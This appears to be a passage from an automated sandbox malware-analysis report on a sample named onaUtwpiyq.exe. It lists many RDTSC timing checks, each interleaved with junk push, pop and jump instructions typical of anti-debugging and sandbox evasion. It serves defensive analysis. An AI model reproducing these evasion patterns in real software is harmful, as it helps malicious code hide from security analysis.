                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B69F63 second address: B69F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF3D0D8173Fh 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3D0D8173Ah 0x00000015 jmp 00007FF3D0D8173Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B035 second address: B6B042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B042 second address: B6B046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B2DF second address: B6B2F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FF3D0F68BA6h 0x00000009 jl 00007FF3D0F68BA6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FF3D0F68BA6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B2F9 second address: B6B2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B2FD second address: B6B319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jl 00007FF3D0F68BA6h 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007FF3D0F68BA6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B319 second address: B6B32D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B32D second address: B6B331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B896 second address: B6B8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF3D0D81736h 0x0000000a jmp 00007FF3D0D8173Ah 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B8B1 second address: B6B8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B8B6 second address: B6B8BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6BBB0 second address: B6BBFC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0F68BA6h 0x00000008 jmp 00007FF3D0F68BB0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF3D0F68BAAh 0x00000014 jns 00007FF3D0F68BAAh 0x0000001a popad 0x0000001b jl 00007FF3D0F68BCFh 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 jmp 00007FF3D0F68BB3h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B704C5 second address: B704C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F801 second address: B6F805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F805 second address: B6F809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F809 second address: B6F82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BB3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007FF3D0F68BA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F82B second address: B6F84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jl 00007FF3D0D81736h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FF3D0D8173Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F84A second address: B6F855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6FB14 second address: B6FB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6FE96 second address: B6FECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jne 00007FF3D0F68BA6h 0x0000000c jmp 00007FF3D0F68BAAh 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 jnp 00007FF3D0F68BAAh 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007FF3D0F68BA6h 0x00000024 jmp 00007FF3D0F68BAAh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B70028 second address: B7002E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7002E second address: B70034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B70175 second address: B701B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnc 00007FF3D0D81736h 0x0000000e jmp 00007FF3D0D8173Ch 0x00000013 jmp 00007FF3D0D81746h 0x00000018 jmp 00007FF3D0D8173Ah 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B701B0 second address: B701B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7D578 second address: B7D57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7B721 second address: B7B725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7B725 second address: B7B729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7B9BC second address: B7B9C9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7BE41 second address: B7BE45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7BE45 second address: B7BE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7BFE2 second address: B7BFF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0D81741h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7BFF8 second address: B7BFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7C189 second address: B7C199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FF3D0D81736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7C2FE second address: B7C30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF3D0F68BA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7C49E second address: B7C4A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7CC87 second address: B7CC95 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF3D0F68BA6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7CC95 second address: B7CC99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7CC99 second address: B7CC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7B12B second address: B7B12F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B82A1A second address: B82A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0F68BB5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B82A33 second address: B82A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B82A37 second address: B82A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF3D0F68BA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF3D0F68BB3h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B82A5A second address: B82A87 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3D0D81736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FF3D0D81785h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF3D0D8173Ch 0x00000019 jmp 00007FF3D0D8173Dh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B82BE2 second address: B82C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BB7h 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FF3D0F68BA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B82C07 second address: B82C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B82C0B second address: B82C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B82D5C second address: B82D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B82D65 second address: B82D6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B85424 second address: B85428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B85428 second address: B85434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B85434 second address: B8543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B90D67 second address: B90D6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B90D6C second address: B90D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF3D0D81736h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B90D79 second address: B90DC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB0h 0x00000007 jne 00007FF3D0F68BA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FF3D0F68BACh 0x00000019 jmp 00007FF3D0F68BB7h 0x0000001e jnc 00007FF3D0F68BA6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B90DC3 second address: B90DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B90DC8 second address: B90DCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B90DCE second address: B90DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B90890 second address: B9089A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0F68BA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B9089A second address: B908A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FF3D0D81736h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B908A8 second address: B908B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B908B0 second address: B908D3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3D0D8173Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jp 00007FF3D0D8173Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B90A76 second address: B90A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FF3D0F68BB2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B960CA second address: B960D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF3D0D81736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B960D4 second address: B960F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB4h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a je 00007FF3D0F68BA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B98900 second address: B98906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B98906 second address: B98923 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF3D0F68BADh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B984FA second address: B98509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF3D0D81736h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BA76A0 second address: BA76A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BA76A5 second address: BA76CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D81748h 0x00000009 jg 00007FF3D0D81736h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AC2492 second address: AC2497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BAEEB3 second address: BAEEB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BAF020 second address: BAF02B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007FF3D0F68BA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BAF312 second address: BAF327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF3D0D81736h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007FF3D0D81736h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BAF327 second address: BAF32D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BAF59D second address: BAF5BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FF3D0D8173Fh 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BB32B5 second address: BB32B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BB32B9 second address: BB32D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF3D0D81736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF3D0D8173Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BB2DBD second address: BB2DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF3D0F68BA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BB2DC7 second address: BB2DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BB2DCB second address: BB2DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BB2F6D second address: BB2F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BB2F71 second address: BB2F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BB2F75 second address: BB2F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BBD1BD second address: BBD1C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BD3B38 second address: BD3B4E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF3D0D8173Ch 0x00000008 jnp 00007FF3D0D8173Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BD3710 second address: BD371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BE9A40 second address: BE9A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BEA4CA second address: BEA4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BEA4CE second address: BEA500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D8173Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF3D0D8173Dh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FF3D0D8173Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BEA500 second address: BEA506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BED2B3 second address: BED2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FF3D0D81738h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BED2C7 second address: BED2CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BED2CB second address: BED2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BEE837 second address: BEE83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BEE83C second address: BEE84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF3D0D81736h 0x0000000a jne 00007FF3D0D81736h 0x00000010 rdtsc
